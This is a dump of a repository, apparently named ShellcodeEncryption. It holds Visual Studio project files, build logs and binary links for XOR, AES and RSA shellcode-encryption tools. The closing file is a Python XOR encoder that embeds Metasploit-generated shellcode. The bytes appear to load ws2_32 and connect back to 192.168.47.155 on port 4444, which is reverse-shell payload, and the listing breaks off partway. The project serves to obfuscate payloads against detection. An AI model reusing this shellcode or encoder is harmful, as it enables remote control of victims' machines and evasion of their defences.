65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 | Level3
76 | true
77 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
78 | true
79 |
80 |
81 | Console
82 | true
83 |
84 |
85 |
86 |
87 | Level3
88 | true
89 | true
90 | true
91 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
92 | true
93 |
94 |
95 | Console
96 | true
97 | true
98 | true
99 |
100 |
101 |
102 |
103 | Level3
104 | false
105 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
106 | true
107 |
108 |
109 | Console
110 | true
111 |
112 |
113 |
114 |
115 | Level3
116 | true
117 | true
118 | false
119 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
120 | true
121 |
122 |
123 | Console
124 | true
125 | true
126 | true
127 |
128 |
129 |
130 |
131 |
132 |
133 |
134 |
135 |
136 |
--------------------------------------------------------------------------------
/rsa加密/rsa加密.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | 源文件
20 |
21 |
22 | 源文件
23 |
24 |
25 |
--------------------------------------------------------------------------------
/rsa加密/rsa加密.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/rsa加密/x64/Debug/applink.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/rsa加密/x64/Debug/applink.obj
--------------------------------------------------------------------------------
/rsa加密/x64/Debug/main.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/rsa加密/x64/Debug/main.obj
--------------------------------------------------------------------------------
/rsa加密/x64/Debug/rsa加密.Build.CppClean.log:
--------------------------------------------------------------------------------
1 | e:\source code\c_code\shellcode加密\rsa加密\x64\debug\vc143.pdb
2 | e:\source code\c_code\shellcode加密\rsa加密\x64\debug\vc143.idb
3 | e:\source code\c_code\shellcode加密\rsa加密\x64\debug\main.obj
4 | e:\source code\c_code\shellcode加密\rsa加密\x64\debug\rsa加密.ilk
5 | e:\source code\c_code\shellcode加密\x64\debug\rsa加密.exe
6 | e:\source code\c_code\shellcode加密\x64\debug\rsa加密.pdb
7 | e:\source code\c_code\shellcode加密\rsa加密\x64\debug\rsa加密.tlog\cl.command.1.tlog
8 | e:\source code\c_code\shellcode加密\rsa加密\x64\debug\rsa加密.tlog\cl.read.1.tlog
9 | e:\source code\c_code\shellcode加密\rsa加密\x64\debug\rsa加密.tlog\cl.write.1.tlog
10 | e:\source code\c_code\shellcode加密\rsa加密\x64\debug\rsa加密.tlog\link.command.1.tlog
11 | e:\source code\c_code\shellcode加密\rsa加密\x64\debug\rsa加密.tlog\link.read.1.tlog
12 | e:\source code\c_code\shellcode加密\rsa加密\x64\debug\rsa加密.tlog\link.write.1.tlog
13 |
--------------------------------------------------------------------------------
/rsa加密/x64/Debug/rsa加密.exe.recipe:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | E:\Source Code\C_code\shellcode加密\x64\Debug\rsa加密.exe
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/rsa加密/x64/Debug/rsa加密.ilk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/rsa加密/x64/Debug/rsa加密.ilk
--------------------------------------------------------------------------------
/rsa加密/x64/Debug/rsa加密.log:
--------------------------------------------------------------------------------
1 | main.cpp
2 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(14,14): warning C4996: 'fopen': This function or variable may be unsafe. Consider using fopen_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
3 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(15,9): warning C4996: 'PEM_write_RSAPublicKey': Since OpenSSL 3.0
4 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(18,14): warning C4996: 'fopen': This function or variable may be unsafe. Consider using fopen_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
5 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(19,9): warning C4996: 'PEM_write_RSAPrivateKey': Since OpenSSL 3.0
6 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(80,130): warning C4267: “参数”: 从“size_t”转换到“int”,可能丢失数据
7 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(29,20): warning C4996: 'RSA_new': Since OpenSSL 3.0
8 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(33,5): warning C4996: 'RSA_generate_key_ex': Since OpenSSL 3.0
9 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(80,28): warning C4996: 'RSA_public_encrypt': Since OpenSSL 3.0
10 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(88,28): warning C4996: 'RSA_private_decrypt': Since OpenSSL 3.0
11 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(97,5): warning C4996: 'RSA_free': Since OpenSSL 3.0
12 | 正在创建库 E:\Source Code\C_code\shellcode加密\x64\Debug\rsa加密.lib 和对象 E:\Source Code\C_code\shellcode加密\x64\Debug\rsa加密.exp
13 | LINK : warning LNK4232: 名称 rsa加密.exe 包含非 ASCII 字符,在具有除 936 以外的 ANSI 代码页的系统上可能不能加载 DLL
14 | rsa加密.vcxproj -> E:\Source Code\C_code\shellcode加密\x64\Debug\rsa加密.exe
15 | E:\vcpkg\scripts\buildsystems\msbuild\vcpkg.targets(228,5): warning : [vcpkg] Failed to gather app local DLL dependencies, program may not run. Set VcpkgApplocalDeps to false in your project file to suppress this warning. PowerShell arguments: -ExecutionPolicy Bypass -noprofile -File "E:\vcpkg\scripts\buildsystems\msbuild\applocal.ps1" "E:\Source Code\C_code\shellcode加密\x64\Debug\rsa加密.exe" "E:\vcpkg\installed\x64-windows\debug\bin" "x64\Debug\rsa加密.tlog\rsa加密.write.1u.tlog" "x64\Debug\vcpkg.applocal.log"
16 |
--------------------------------------------------------------------------------
/rsa加密/x64/Debug/rsa加密.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/rsa加密/x64/Debug/rsa加密.tlog/CL.command.1.tlog
--------------------------------------------------------------------------------
/rsa加密/x64/Debug/rsa加密.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/rsa加密/x64/Debug/rsa加密.tlog/CL.read.1.tlog
--------------------------------------------------------------------------------
/rsa加密/x64/Debug/rsa加密.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/rsa加密/x64/Debug/rsa加密.tlog/CL.write.1.tlog
--------------------------------------------------------------------------------
/rsa加密/x64/Debug/rsa加密.tlog/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/rsa加密/x64/Debug/rsa加密.tlog/link.command.1.tlog
--------------------------------------------------------------------------------
/rsa加密/x64/Debug/rsa加密.tlog/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/rsa加密/x64/Debug/rsa加密.tlog/link.read.1.tlog
--------------------------------------------------------------------------------
/rsa加密/x64/Debug/rsa加密.tlog/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/rsa加密/x64/Debug/rsa加密.tlog/link.write.1.tlog
--------------------------------------------------------------------------------
/rsa加密/x64/Debug/rsa加密.tlog/link.write.2u.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/rsa加密/x64/Debug/rsa加密.tlog/link.write.2u.tlog
--------------------------------------------------------------------------------
/rsa加密/x64/Debug/rsa加密.tlog/rsa加密.lastbuildstate:
--------------------------------------------------------------------------------
1 | PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.35.32215:TargetPlatformVersion=10.0.22621.0:VcpkgTriplet=x64-windows:
2 | Debug|x64|E:\Source Code\C_code\shellcode加密\|
3 |
--------------------------------------------------------------------------------
/rsa加密/x64/Debug/rsa加密.vcxproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/rsa加密/x64/Debug/rsa加密.vcxproj.FileListAbsolute.txt
--------------------------------------------------------------------------------
/rsa加密/x64/Debug/vc143.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/rsa加密/x64/Debug/vc143.idb
--------------------------------------------------------------------------------
/rsa加密/x64/Debug/vc143.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/rsa加密/x64/Debug/vc143.pdb
--------------------------------------------------------------------------------
/rsa加密/x64/Release/applink.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/rsa加密/x64/Release/applink.obj
--------------------------------------------------------------------------------
/rsa加密/x64/Release/rsa加密.Build.CppClean.log:
--------------------------------------------------------------------------------
1 | e:\source code\c_code\shellcode加密\rsa加密\x64\release\vc143.pdb
2 | e:\source code\c_code\shellcode加密\rsa加密\x64\release\applink.obj
3 | e:\source code\c_code\shellcode加密\rsa加密\x64\release\main.obj
4 | e:\source code\c_code\shellcode加密\x64\release\rsa加密.lib
5 | e:\source code\c_code\shellcode加密\x64\release\rsa加密.exp
6 | e:\source code\c_code\shellcode加密\x64\release\rsa加密.exe
7 | e:\source code\c_code\shellcode加密\rsa加密\x64\release\rsa加密.ipdb
8 | e:\source code\c_code\shellcode加密\x64\release\rsa加密.pdb
9 | e:\source code\c_code\shellcode加密\rsa加密\x64\release\rsa加密.iobj
10 | e:\source code\c_code\shellcode加密\rsa加密\x64\release\rsa加密.tlog\cl.command.1.tlog
11 | e:\source code\c_code\shellcode加密\rsa加密\x64\release\rsa加密.tlog\cl.read.1.tlog
12 | e:\source code\c_code\shellcode加密\rsa加密\x64\release\rsa加密.tlog\cl.write.1.tlog
13 | e:\source code\c_code\shellcode加密\rsa加密\x64\release\rsa加密.tlog\link.command.1.tlog
14 | e:\source code\c_code\shellcode加密\rsa加密\x64\release\rsa加密.tlog\link.read.1.tlog
15 | e:\source code\c_code\shellcode加密\rsa加密\x64\release\rsa加密.tlog\link.write.1.tlog
16 | e:\source code\c_code\shellcode加密\rsa加密\x64\release\rsa加密.tlog\link.write.2u.tlog
17 |
--------------------------------------------------------------------------------
/rsa加密/x64/Release/rsa加密.exe.recipe:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | E:\Source Code\C_code\shellcode加密\x64\Release\rsa加密.exe
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/rsa加密/x64/Release/rsa加密.log:
--------------------------------------------------------------------------------
1 | applink.c
2 | E:\Source Code\C_code\shellcode加密\rsa加密\applink.c(121,47): warning C4996: 'fopen': This function or variable may be unsafe. Consider using fopen_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
3 | E:\Source Code\C_code\shellcode加密\rsa加密\applink.c(129,46): warning C4996: '_open': This function or variable may be unsafe. Consider using _sopen_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
4 | main.cpp
5 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(14,14): warning C4996: 'fopen': This function or variable may be unsafe. Consider using fopen_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
6 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(15,9): warning C4996: 'PEM_write_RSAPublicKey': Since OpenSSL 3.0
7 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(18,14): warning C4996: 'fopen': This function or variable may be unsafe. Consider using fopen_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
8 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(19,9): warning C4996: 'PEM_write_RSAPrivateKey': Since OpenSSL 3.0
9 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(53,16): warning C4996: 'fopen': This function or variable may be unsafe. Consider using fopen_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
10 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(59,23): warning C4996: 'PEM_read_RSAPrivateKey': Since OpenSSL 3.0
11 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(67,24): warning C4996: 'RSA_private_decrypt': Since OpenSSL 3.0
12 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(68,5): warning C4996: 'RSA_free': Since OpenSSL 3.0
13 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(105,47): error C2065: “shellcode”: 未声明的标识符
14 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(105,89): error C2065: “shellcode”: 未声明的标识符
15 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(105,119): error C2065: “keypair”: 未声明的标识符
16 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(105,28): error C2660: “RSA_public_encrypt”: 函数不接受 4 个参数
17 | E:\vcpkg\installed\x64-windows\include\openssl\rsa.h(288,5): message : 参见“RSA_public_encrypt”的声明
18 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(105,28): message : 尝试匹配参数列表“()”时
19 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(114,88): error C2065: “keypair”: 未声明的标识符
20 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(130,14): error C2065: “keypair”: 未声明的标识符
21 | E:\Source Code\C_code\shellcode加密\rsa加密\main.cpp(131,13): error C2065: “bn”: 未声明的标识符
22 |
--------------------------------------------------------------------------------
/rsa加密/x64/Release/rsa加密.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/rsa加密/x64/Release/rsa加密.tlog/CL.command.1.tlog
--------------------------------------------------------------------------------
/rsa加密/x64/Release/rsa加密.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/rsa加密/x64/Release/rsa加密.tlog/CL.read.1.tlog
--------------------------------------------------------------------------------
/rsa加密/x64/Release/rsa加密.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/rsa加密/x64/Release/rsa加密.tlog/CL.write.1.tlog
--------------------------------------------------------------------------------
/rsa加密/x64/Release/rsa加密.tlog/rsa加密.lastbuildstate:
--------------------------------------------------------------------------------
1 | PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.35.32215:TargetPlatformVersion=10.0.22621.0:VcpkgTriplet=x64-windows:
2 | Release|x64|E:\Source Code\C_code\shellcode加密\|
3 |
--------------------------------------------------------------------------------
/rsa加密/x64/Release/rsa加密.tlog/unsuccessfulbuild:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/rsa加密/x64/Release/rsa加密.tlog/unsuccessfulbuild
--------------------------------------------------------------------------------
/rsa加密/x64/Release/rsa加密.vcxproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/rsa加密/x64/Release/rsa加密.vcxproj.FileListAbsolute.txt
--------------------------------------------------------------------------------
/rsa加密/x64/Release/vc143.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/rsa加密/x64/Release/vc143.pdb
--------------------------------------------------------------------------------
/shellcode加密.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 17
4 | VisualStudioVersion = 17.5.33530.505
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "xor加密", "xor加密\xor加密.vcxproj", "{F6E80E9F-0333-4AF4-8BBD-E9B6C2A8A4B9}"
7 | EndProject
8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "aes加密", "aes加密\aes加密.vcxproj", "{734881F0-B88D-41E3-B9C2-A48A8E0772D4}"
9 | EndProject
10 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Shellcode加密库", "Shellcode加密库\Shellcode加密库.vcxproj", "{B4DC16FF-79C8-4C66-BE29-8528B628B876}"
11 | EndProject
12 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "rsa加密", "rsa加密\rsa加密.vcxproj", "{1F7476FA-60C8-4F91-8FD5-C5E31D3A6888}"
13 | EndProject
14 | Global
15 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
16 | Debug|x64 = Debug|x64
17 | Debug|x86 = Debug|x86
18 | Release|x64 = Release|x64
19 | Release|x86 = Release|x86
20 | EndGlobalSection
21 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
22 | {F6E80E9F-0333-4AF4-8BBD-E9B6C2A8A4B9}.Debug|x64.ActiveCfg = Debug|x64
23 | {F6E80E9F-0333-4AF4-8BBD-E9B6C2A8A4B9}.Debug|x64.Build.0 = Debug|x64
24 | {F6E80E9F-0333-4AF4-8BBD-E9B6C2A8A4B9}.Debug|x86.ActiveCfg = Debug|Win32
25 | {F6E80E9F-0333-4AF4-8BBD-E9B6C2A8A4B9}.Debug|x86.Build.0 = Debug|Win32
26 | {F6E80E9F-0333-4AF4-8BBD-E9B6C2A8A4B9}.Release|x64.ActiveCfg = Release|x64
27 | {F6E80E9F-0333-4AF4-8BBD-E9B6C2A8A4B9}.Release|x64.Build.0 = Release|x64
28 | {F6E80E9F-0333-4AF4-8BBD-E9B6C2A8A4B9}.Release|x86.ActiveCfg = Release|Win32
29 | {F6E80E9F-0333-4AF4-8BBD-E9B6C2A8A4B9}.Release|x86.Build.0 = Release|Win32
30 | {734881F0-B88D-41E3-B9C2-A48A8E0772D4}.Debug|x64.ActiveCfg = Debug|x64
31 | {734881F0-B88D-41E3-B9C2-A48A8E0772D4}.Debug|x64.Build.0 = Debug|x64
32 | {734881F0-B88D-41E3-B9C2-A48A8E0772D4}.Debug|x86.ActiveCfg = Debug|Win32
33 | {734881F0-B88D-41E3-B9C2-A48A8E0772D4}.Debug|x86.Build.0 = Debug|Win32
34 | {734881F0-B88D-41E3-B9C2-A48A8E0772D4}.Release|x64.ActiveCfg = Release|x64
35 | {734881F0-B88D-41E3-B9C2-A48A8E0772D4}.Release|x64.Build.0 = Release|x64
36 | {734881F0-B88D-41E3-B9C2-A48A8E0772D4}.Release|x86.ActiveCfg = Release|Win32
37 | {734881F0-B88D-41E3-B9C2-A48A8E0772D4}.Release|x86.Build.0 = Release|Win32
38 | {B4DC16FF-79C8-4C66-BE29-8528B628B876}.Debug|x64.ActiveCfg = Debug|x64
39 | {B4DC16FF-79C8-4C66-BE29-8528B628B876}.Debug|x64.Build.0 = Debug|x64
40 | {B4DC16FF-79C8-4C66-BE29-8528B628B876}.Debug|x86.ActiveCfg = Debug|Win32
41 | {B4DC16FF-79C8-4C66-BE29-8528B628B876}.Debug|x86.Build.0 = Debug|Win32
42 | {B4DC16FF-79C8-4C66-BE29-8528B628B876}.Release|x64.ActiveCfg = Release|x64
43 | {B4DC16FF-79C8-4C66-BE29-8528B628B876}.Release|x64.Build.0 = Release|x64
44 | {B4DC16FF-79C8-4C66-BE29-8528B628B876}.Release|x86.ActiveCfg = Release|Win32
45 | {B4DC16FF-79C8-4C66-BE29-8528B628B876}.Release|x86.Build.0 = Release|Win32
46 | {1F7476FA-60C8-4F91-8FD5-C5E31D3A6888}.Debug|x64.ActiveCfg = Debug|x64
47 | {1F7476FA-60C8-4F91-8FD5-C5E31D3A6888}.Debug|x64.Build.0 = Debug|x64
48 | {1F7476FA-60C8-4F91-8FD5-C5E31D3A6888}.Debug|x86.ActiveCfg = Debug|Win32
49 | {1F7476FA-60C8-4F91-8FD5-C5E31D3A6888}.Debug|x86.Build.0 = Debug|Win32
50 | {1F7476FA-60C8-4F91-8FD5-C5E31D3A6888}.Release|x64.ActiveCfg = Release|x64
51 | {1F7476FA-60C8-4F91-8FD5-C5E31D3A6888}.Release|x64.Build.0 = Release|x64
52 | {1F7476FA-60C8-4F91-8FD5-C5E31D3A6888}.Release|x86.ActiveCfg = Release|Win32
53 | {1F7476FA-60C8-4F91-8FD5-C5E31D3A6888}.Release|x86.Build.0 = Release|Win32
54 | EndGlobalSection
55 | GlobalSection(SolutionProperties) = preSolution
56 | HideSolutionNode = FALSE
57 | EndGlobalSection
58 | GlobalSection(ExtensibilityGlobals) = postSolution
59 | SolutionGuid = {82722DB7-F2B9-48EA-A044-2762823E3C8D}
60 | EndGlobalSection
61 | EndGlobal
62 |
--------------------------------------------------------------------------------
/x64/Debug/Shellcode加密库.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/x64/Debug/Shellcode加密库.idb
--------------------------------------------------------------------------------
/x64/Debug/Shellcode加密库.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/x64/Debug/Shellcode加密库.lib
--------------------------------------------------------------------------------
/x64/Debug/Shellcode加密库.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/x64/Debug/Shellcode加密库.pdb
--------------------------------------------------------------------------------
/x64/Debug/aes加密.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/x64/Debug/aes加密.exe
--------------------------------------------------------------------------------
/x64/Debug/aes加密.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/x64/Debug/aes加密.pdb
--------------------------------------------------------------------------------
/x64/Debug/rsa加密.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/x64/Debug/rsa加密.exe
--------------------------------------------------------------------------------
/x64/Debug/rsa加密.exp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/x64/Debug/rsa加密.exp
--------------------------------------------------------------------------------
/x64/Debug/rsa加密.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/x64/Debug/rsa加密.lib
--------------------------------------------------------------------------------
/x64/Debug/rsa加密.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/x64/Debug/rsa加密.pdb
--------------------------------------------------------------------------------
/x64/Debug/xor加密.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/x64/Debug/xor加密.exe
--------------------------------------------------------------------------------
/x64/Debug/xor加密.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/x64/Debug/xor加密.pdb
--------------------------------------------------------------------------------
/x64/Release/Shellcode加密库.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/x64/Release/Shellcode加密库.lib
--------------------------------------------------------------------------------
/x64/Release/Shellcode加密库.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/x64/Release/Shellcode加密库.pdb
--------------------------------------------------------------------------------
/x64/Release/aes加密.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/x64/Release/aes加密.exe
--------------------------------------------------------------------------------
/x64/Release/aes加密.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/x64/Release/aes加密.pdb
--------------------------------------------------------------------------------
/x64/Release/xor加密.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/x64/Release/xor加密.exe
--------------------------------------------------------------------------------
/x64/Release/xor加密.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/x64/Release/xor加密.pdb
--------------------------------------------------------------------------------
/xor加密/Shellcode_XorEncoder.py:
--------------------------------------------------------------------------------
1 | # 定义异或加密函数,接收原始shellcode和密钥作为输入
2 | def xor_encrypt(shellcode, key):
3 | encrypted_shellcode = bytearray()
4 | key_len = len(key)
5 |
6 | # 遍历shellcode中的每个字节
7 | for i in range(len(shellcode)):
8 | # 将当前字节与密钥中相应字节进行异或操作,然后添加到加密后的shellcode中
9 | # 这段代码中的i % key_len操作用于确保在对shellcode进行异或加密时,密钥循环使用
10 | encrypted_shellcode.append(shellcode[i] ^ key[i % key_len])
11 | return encrypted_shellcode
12 |
13 | def main():
14 | # msf生成的shellcode
15 | buf = b""
16 | buf += b"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51"
17 | buf += b"\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52"
18 | buf += b"\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72"
19 | buf += b"\x50\x4d\x31\xc9\x48\x0f\xb7\x4a\x4a\x48\x31\xc0"
20 | buf += b"\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
21 | buf += b"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b"
22 | buf += b"\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f"
23 | buf += b"\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48"
24 | buf += b"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44"
25 | buf += b"\x8b\x40\x20\x49\x01\xd0\xe3\x56\x4d\x31\xc9\x48"
26 | buf += b"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x48\x31\xc0"
27 | buf += b"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1"
28 | buf += b"\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44"
29 | buf += b"\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
30 | buf += b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
31 | buf += b"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
32 | buf += b"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
33 | buf += b"\x59\x5a\x48\x8b\x12\xe9\x4b\xff\xff\xff\x5d\x49"
34 | buf += b"\xbe\x77\x73\x32\x5f\x33\x32\x00\x00\x41\x56\x49"
35 | buf += b"\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5"
36 | buf += b"\x49\xbc\x02\x00\x11\x5c\xc0\xa8\x2f\x9b\x41\x54"
37 | buf += b"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07"
38 | buf += b"\xff\xd5\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41"
